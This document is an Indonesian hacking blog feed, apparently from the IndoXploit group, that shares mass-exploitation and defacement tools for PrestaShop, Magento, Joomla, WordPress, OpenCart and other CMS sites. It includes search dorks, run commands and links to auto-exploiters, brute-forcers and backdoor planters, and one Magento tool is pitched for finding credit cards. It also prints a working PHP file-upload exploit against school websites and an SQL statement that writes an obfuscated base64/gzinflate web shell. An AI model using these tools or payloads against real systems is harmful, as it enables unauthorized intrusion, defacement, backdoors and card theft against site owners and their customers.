Prestashop Module Blocktestimonial File Upload

================================================================
[+] Google Dork: inurl:"/modules/blocktestimonial/"
[+] Vuln: www.target.com/modules/blocktestimonial/addtestimonial.php
[+] Tutorial:
- http://www.tkjcyberart.org/2016/12/prestashop-blocktestimonial-upload.html
- http://3xploi7.blogspot.co.id/2016/12/pretashop-blocktestimonial-upload-shell.html
[+] Exploiter: http://pastebin.com/8kvqR7u1 ( Web Based )
================================================================

Saya sudah membuat tools untuk memudahkan kita mengexploit targetnya....

Silakan download exploiternya, lalu upload di shell/hosting untuk menjalankannya

Oke Sekian dulu, happy hacking :D

NB: Sumber tertera diatas

Read more

Bot Auto Tusbol Hosting Nazuka

Haloo guys. Kali ini ane mau share bot bing dorker + auto exploit + zone-h submit untuk exploit elfinder di hostig nazuka. Jadi tinggal masukkan dork bing nya, tinggal coli, dan biarkan bot yang bekerja. Biar rata sekalian hahaha :D .

Pertama tau exploit ini sebenernya 4 hari yang lalu, di grup chat Jancok Security. Tapi pas baca, saya gak tertarik samasekali . Maklum, saya sudah gak minat sama deface deface. Cuman tadi mau nyari berita di zone-h kok banyak arsip hosting nazuka, jadi kepikiran buat bot nya.

Untuk script nya bisa download disini :

Bot Auto Tusbol Nazuka

Sebelumnya thanks banget buat Mr.MaGnoM, atas referensi bing dorker nya. Big respect bro :)

Oh iya, disini ada beberapa parameter yang harus diubah.

$zh = "zafk1el"; 

Itu nick zone-h. Silahkan diganti sendiri ya.

Lalu bagian 

$isi_nama_doang = 

Yang di encode tersebut script deface . Jadi silahkan diganti dengan cara encode terlebih dahulu script deface kalian ke base64 lalu masukkan kesitu.

Cara pakainya gimana bang ?

Gampang banget. 

Tinggal masukkan perintah

php namafile.php

Lalu enter. Selanjutnya masukkan bing dork nya.

PS : Ini CLI based, bukan web based. Dan juga ini BING dorker, jadi jangan pakai dork google. 

Thanks.

Read more

Lokomedia (SQL Injection) + Auto Scan Admin Login + Auto Crack Password

Hallo~~ selamat malam, kali ini gua akan share tools lagi buat kalian penyuka exploit sql injection CMS Lokomedia.
Biar ga pusing-pusing, ini tools gua buat supaya lebih mudah aja hehehe

Oke Langsung aja ini dia penampakan tools nya: [ CLI ]

[ Web Based ]

Cara Pake: [CLI]
- Masukan file lokomedia.php dan target.txt nya kedalam 1 folder yang sama.
- format target di dalam file target.txt

http://target.com/
http://target2.com/
http://target3.com/
http://target4.com/

- bukalah cmd (install xampp terlebih dahulu jika kalian menggunakan OS Windows).
jalankan command berikut: php lokomedia.php target.txt

Cara Pake: [Web Based]
- upload script ke hosting/shell kalian.
- buka file exploiter tersebut ( web.com/lokomedia.php )
- masukan targetnya

http://target.com/
http://target2.com/
http://target3.com/
http://target4.com/

LINK [ CLI ] -> http://pastebin.com/sPpJRjCZ
LINK [ Web Based ] -> http://pastebin.com/0STXanAx

mudah bukan? hehehe.
Oke Sekian dulu, selamat malamm ^^

Read more

Magento Bot with Bing Dorker

Assalamualaikum, selamat malam gannnn......
Sorry baru ini gua posting lagi di karenakan sekarang udah jarang dpt exploit" fresh wkwkwkk dan bingung juga mau bikin tutor apa. :v

Okee gausah panjang lebar, dalam kesempatan kali ini gua pgn share sebuah tools untuk para Logger yang doyan mainan magento buat cari cc dll :v.

Ini dia penampakan toolsnya:

Tools ini sudah dibuat sedimikian rupa dan pastinya enak dipake :v aman gaada logger karena gua share secara [open source] :).
Dalam tools ini, gua menggabungkan beberapa tools sekaligus + membuatnya semakin mudah dengan memakai Bing Dorker. ( duduk tenang aja gannn, masukin dork -> tunggu mangsa hehehehe :D ).

fitur:
- Magento Add Admin Xploit
=> detect filesystem
=> detect downloader+permission
=> get info average order,lifetime sales,quantity order
=> get info total customers
=> get info installed packages.
- Magento Webforms Xploit

Link-> http://pastebin.com/aGh7w1Ub

*NB: usage: php namafile.php 'bing_dorker'
*NB: php magento.php '"/customer/account/login" site:it'
*NB: $shell = "id.php"; // ganti id.php dengan shell kalian yang berada dalam 1 Folder dengan tools ini *NB: INGET DISINI KITA PAKE DORK BING, BUKAN GOOGLE DORK!!!
dalam tools ini, result target yang berhasil di exploit tidak otomatis tersimpan dalam sebuah file.txt, jadi kalian harus cek 1 1 target kalian yang berhasil di exploit di Terminal/CMD nya langsung. ( maaf gan, ga kepikiran , keburu di publish wkwkw )

Oke sekian duluuu,
Thanks to: Mr. Magnom ( for bing dorker )
Greetz: IndoXploit - Sanjungan Jiwa - Jloyal - Jancok Sec - Res7ock Crew

Read more

Full Bot Deface Website

Hai semuanya, udah lama banget ngk buat tutor. Gw udh mulai bosen dgn semua ini. Makanya gw pengen share Tools yang menurut gw manteb untuk maen bot - botan..

Cara kerja tools ini ialah dengan mengambil nama domain dari web mirror zone-deface.com, abis itu dapetin ip-nya. nah ipnya kita scan deh di bing. Abis itu kita grab lagi dan kita scan cms apa yg dipakai, terus di save sesuai cmsnya dan di eksploitasi sesuai cms-nya.

Tapi disini gw cuma ada exploit com_media, jce, jdownloads..
untuk yg laen lu cari sendiri ya.

Download Tools disini.
https://drive.google.com/file/d/0B4_2Vn34hkX1V1JYcDFXSlZ2VzQ/view?usp=sharing

command:
php ambil.php attacker_Tu5b0l3d 72 && perl setan.pl ip.htm 31 && php detek.php target_setan.htm && php exploit.php 1-Joomla.htm

catatan:
72 itu ialah page akhir dari attacker_Tu5b0l3d
sesuain sama attacker/team yg mau di grab di http://zone-deface.com/

31 itu page paling akhir pas scan di bing.
klo mau scan sampe 50 page, ubah jadi 51

exploit.php itu isinya ada exploit com_media, jce, jdownloads.
ganti di k.txt dan k.png,
pkoknya harus ada kata - kata hacked.
ganti juga nick di zone-h

1-Joomla.htm itu list joomla site.

Video:
https://www.youtube.com/watch?v=GTocBpZ8eXM

##.
Thx buat bang fyelix yang udah ngasih VPS.

https://www.facebook.com/groups/indoxploitpublic/

Read more

Auto Exploiter WebDav PHP

Auto Exploiter WebDav thx to @Aderoot

Tool webdav yang terkenal yaitu toolnya hmei7, tapi kali ini ane pengen share tool webdav versi php.

script:
http://pastebin.com/eTmsR6JA

video:
https://www.youtube.com/watch?v=LXmfzEVM0mM

bagi yang belum tau cara menjalankannya.
cek cara menjalankan exploiter php

yuk join!
https://www.facebook.com/groups/indoxploitpublic/

keep share.

Read more

PrestaShop Auto Deface by iDx

Dalam zip ini, udah ada exploiter,doc root,shell idx.
dan didalam source exploiternyaa, sudah ada penjelasan, file" apa yang boleh diganti dan tidak diganti, selebihnya harap ikutin code yang ada , daripada nantinya error, tanggung sendiri:p

fitur:
- auto tanem backdoor
- auto deface
- hasil nya ke simpen dalam "hasil.txt", taro semuanya dalam 1 folder yang sama ( CLI version ) jalankan lewat cmd/terminal/vps

Cara Pake:
* masukan seluruh target anda ( full url: http://www.target.com/path/path/path/uploadimage.php ) ke dalam sebuah file.txt. * lalu jalankan cmd pada terminal seperti pada gambar diatas.

format target. ( dalam file.txt )
http://www.target1.com/path/path/path/uploadimage.php
http://www.target2.com/path/path/path/uploadimage.php
http://www.target3.com/path/path/path/uploadimage.php
http://www.target4.com/path/path/path/uploadimage.php
http://www.target5.com/path/path/path/uploadimage.php

Download: http://adf.ly/1bWOfF

Okee sekiann duluuuu ^^

Thanks to: Author exploit, sanjungan jiwa

Read more

Tool Bruteforce Fleksibel

Kali ini gw pengen share tool bruteforce yang menurut gw cukup fleksibel.
mirip kayak hydra kalo ngk salah.

tapi agak ribet, karena banyak parameter yang harus dimasukin.
yaudah langsung aja ini dia toolnya.

script:
http://pastebin.com/9Z5fUhNK

Usage:
php brute.php password.txt "username=admin&password=PASS::fail" url

PASS jangan diganti!

password.txt
password_1<br>password_2<br>password_3

fail adalah parameter yang menandakan gagal login, misalnya pas lu klik login
ada tulisan password atau username salah, berarti fail lu bisa ganti jadi salah

url ganti jadi url action loginnya.

tonton videonya biar ngk bingung.
https://youtu.be/zt7XNISMf9g

keep share.
gabung yuk!
group

Read more

Mengambil kata menggunakan preg_match

Abis baca - baca thread lama gw di http://hacker-newbie.org/showthread.php?tid=20672
jadi terharuu..
ternyata udh 2 tahunan maenan exploiter.
sebelumnya gw ucapin byk2 terima kasih kepada bang sohai yang udah ngebimbing gw sejauh ini, bunglon_ijo yang ikut berjuang bersama - sama, rieqyns13 yang udah mau share scannernya.
dan buat lu semua yang udah mau baca tutor ini yang sebenarnya sih ngk terlalu berguna banget...


*Perhatikan kata demi kata yang tak bermakna ini.
sebelumnya mari baca - baca tentang preg_match dulu disini http://php.net/manual/en/function.preg-match.php

tapi disini ane cuma pengen share cara mengambil kata dengan preg_match.
untuk apasih ?

misalnya kita sedang membuat auto upload.
dan ternyata nama filenya menjadi random.
daripada susah - susah ngecek satu per satu secara manual, mending kita ambil aja nama file random itu dan kemudian cek.

mudah saja, misalnya disaat kita selesai upload, outputnya menjadi seperti ini.
"filename":"420331file.php" "message":"Your file has been uploaded"

oke, alurnya seperti ini.
upload -> dapet ouput -> ambil output

yaudah langsung saja.

setelah sudah mendapatkan nama filenya.
baru deh kita cek lagi menggunakan file_get_content atau curl, kemudian pakai preg_match lagi.
tapi karena ini tutor cuma untuk ngambil namanya aja,
yaudah segini aja.
ya mungkin ngk berarti sama sekali.

Tutorial membuat scanner/finder pada website

Correct me if i wrong.

Read more

Upload shell di cms opencart

kali ini ane pengen bagiin tutor upload shell di website cms opencart.
work versi 2 keatas..

cari targetnya bisa pake bruteforce disini
http://blog.indoxploit.or.id/2016/06/deface-dengan-opencart-bruteforce-and.html

langsung aja ke videonya ..
https://www.youtube.com/watch?v=CA6BvEopCEo

a.sql

SELECT '<?php eval (gzinflate(base64_decode("bZBNasNADIX3hd5hGLqIoW4OUHvIpoVCIIV0F4KRbY09MD/C1gRC8d3rcWJooaCNvqenJ4RNH4TswDP6rqgHJV8fHzBB6qmKHhxushXJdcDozVP1eTh+Zd9Ls2sCXWf0/rF/O56klueTZEdVssvz81/hBrNkTVvnparGoYfR2GJbqzxX8uU/x5w7oR3xl6+DDmw6aFrqrgpxv1aHwQmH3Ie2pDCyQN/wlbB00bIhGHibRvIWGFRhPEUWi66NRZFSS73ypbvc5DHWzrAw7QwuYCOWkdT6m+kH"))); ?>' FROM `mouwaffek_table`

thx to spyhackerz.com

Read more

Deface dengan Opencart Bruteforce and Upload image

Kali ini ane pengen share tool bf + upload image di opencart.

referensi:
http://spyhackerz.com/forum/threads/thewayend-opencart-twe-gif-video.1392/

script:
http://pastebin.com/vGRNXUuc

usage:
php Xploit.php target.htm

target.htm
site1.com<br>site2.com<br>site3.com

untuk pengguna windows mungkin bisa install xampp, kemudian taruh script ini di \xampp\php\
dan juga targetnya.
abis itu jalanin pake cmd.

#Keepshare.

Read more

Google Dorker New 2016

Google Dorker New.

kali ini ane pengen share google dorker yg ngambil dari source hasil curl google.
tapi kyknya kurang joss ini.
dikembangin aja lagi..

ini dia:
http://pastebin.com/9heDxH1K

Video:
https://www.youtube.com/watch?v=Ggv4kkYMEM8


update!!
google dorker with dom.
http://pastebin.com/KccgySw0

video:
https://www.youtube.com/watch?v=A2zpIZvPgtQ



#Keepshare
join yuk.
https://www.facebook.com/groups/indoxploitpublic/

Read more

Magento Mass Xploiter

yaaa sebelumynyaa exploit ini sudah di publish di web fatoni.id/malangXploit.php dengan buatan / Coded by Syncronyzer.
karena disana masih single exploiter ( masukan 1 1 ) disini gua recoded menjadi Mass Xploiter .
dengan penambahan fitur sedikit berupa:
Cek Filesystem ( ada atau tidak )
Cek Downloader ( ada + bisa login atau tidak dan juga cek permission nya apakah writeable atau tidak)
ini dia penampakannyaaa.

Link:
=> http://tools.indoxploit.or.id/?m=tools&tools=Magento_Add_Admin_Xploit&act=show
=> CLI Version [webforms,add admin] http://pastebin.com/PXkG73pG

Read more

WordPress Plugins Tevolution Mass Xploiter

Okee gannn, kyknyaa ini exploit lagi booming banget yaaaaa. freshhhh
Thankss buat .
// Res7ock - Aan INCEF buat live targetnyaaaa :D

Ikutin aja kyk di ss gannn.
disini script nyaaaa -> http://pastebin.com/9SCkGP3h

cara pake? :
- masukin ke hosting/shell backdoor
- buka filenyaaa
- happy hackingg ^_^

Read more

Auto exploiter com_media.

kali ini ane pengen share auto exploiter com_media.
yaudah langsung aja.

script:
http://pastebin.com/v23UTCeu

usage: php xploit.php target.htm

edit $file, preg_match, explode

poto:

*nb: kalo udh muncul yang base64, tapi masih NO. coba manual aja.

keep sharing :)

Read more

Deface website sekolah Bangladesh

hallo.

kali ini ane pengen share cara deface school Bangladesh.
ya kyk bug balitbang lah kalo di indo.

Bugnya ada di plugin jquery-file-upload.
yaudah langsung aja.

dork: Developed by exdmania

script:

<?php
$file = "kkk.htm"; //shell ataupun script deface
$post = array("files[]" => "@$file",
);
$ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
echo $data."\n\n\n";
?>

POC:

hasil:

/assets/super_admin/vendor/jquery-file-upload/server/php/files/

keep share :)

Read more

WordPress U-Design Themes Mass Xploiter

Lansunggg aja gannn sedott sourcenyaaaa:
http://pastebin.com/t8PvtP0h

Cara Pake nyaa:
1. Masukin Toolsnya Ke Shell Backdoor / Hosting
2. Masukin Targetnya kyk di SS gan

Ini Google Dorker WP U-Design nya gan biar ga cape cari 1 1:

http://pastebin.com/YFBhSsT6

Salam IndoXploit

Read more

Auto Deface Cms Wordpress melalui link Config

Kali ini ane pengen share auto ganti title pada site cms wordpress melalui grabber configs.

jadi misalnya lu grab configs dan ternyata nemu banyak config wp. nah lu bisa gunain tool ini biar ngk capek nyelem ke db satu per satu.
ngk deface sih, tapi bisa masuk mirror kok ;v

jadi kita cuma masukin http://blabla.com/configs/

ada 2 file,
1 file untuk websitenya.
1 file untuk kita buka di cmd/terminal.

link_index.php
http://pastebin.com/7jLauxGz

ini nantinya yang kita buka pake cmd/terminal.
php link_index.php

edit filenya ya, terutama untuk link configs, link script link_title_2.php, nickname zone-h, script/kata-kata yang mau diganti di title (harus ada kata hacked)

link_title_2.php
http://pastebin.com/9jT5Qvz5

upload diwebsite yg 1 server sama configsnya.
ngk usah diedit.

POC:

kenapa cuma ganti title ?
kenapa ngk deface aja ?
wkwk ribet bro, harus login dlu, terus nanem uploader dlu, baru deh kedeface, blm lgi klo wp-login nya disembunyiin.
jadi ganti title aja, karena ganti title cuma ganti di db, blm masuk ke sitenya.

kenapa versi cli ?
karena ini diperuntukan untuk link config wp yg banyak, makanya gw buat versi cli, klo versi website nanti server ngk kuat, alhasil cuma setengah yang kita pepes.

Videonya:https://www.youtube.com/watch?v=CKfRyqcXbwk

#KeepShare

Read more

Tool Mass Deface

Kali ini ane pengen bagikan script mass deface
selama ini mungkin kita cuma memakainya saja.
karena biasanya tool ini sudah tersedia di shell.

Sebenarnya script ini cukup simple.
tapi cukup bikin puyeng juga kalo belum dapet logikanya.


POC:

Script:
http://pastebin.com/SA7uKgiQ


#KeepShare

Read more

Cara Mengetahui Username Pada Wordpress.

kali ini ane pengen share cara mengetahui username pada wordpress.

ane sendiri juga baru tau setelah kemarin ngubek ngubek WPScan.
cukup simple sih.
cuma menambahkan ?author=id
nanti akan muncul username + namenya.

pada kali ini cuma menampilkan username + name dari id 1-10.
kalo mau sampe 20, ubah aja $id yang didalem for.

POC:

jadi ini cuma menampilkan id yg ada username + namenya aja.
setelah mengetahui usernamenya, silahkan di dictionary attack.

script:
http://pastebin.com/AqCmhr2Y

#KeepShare.

Read more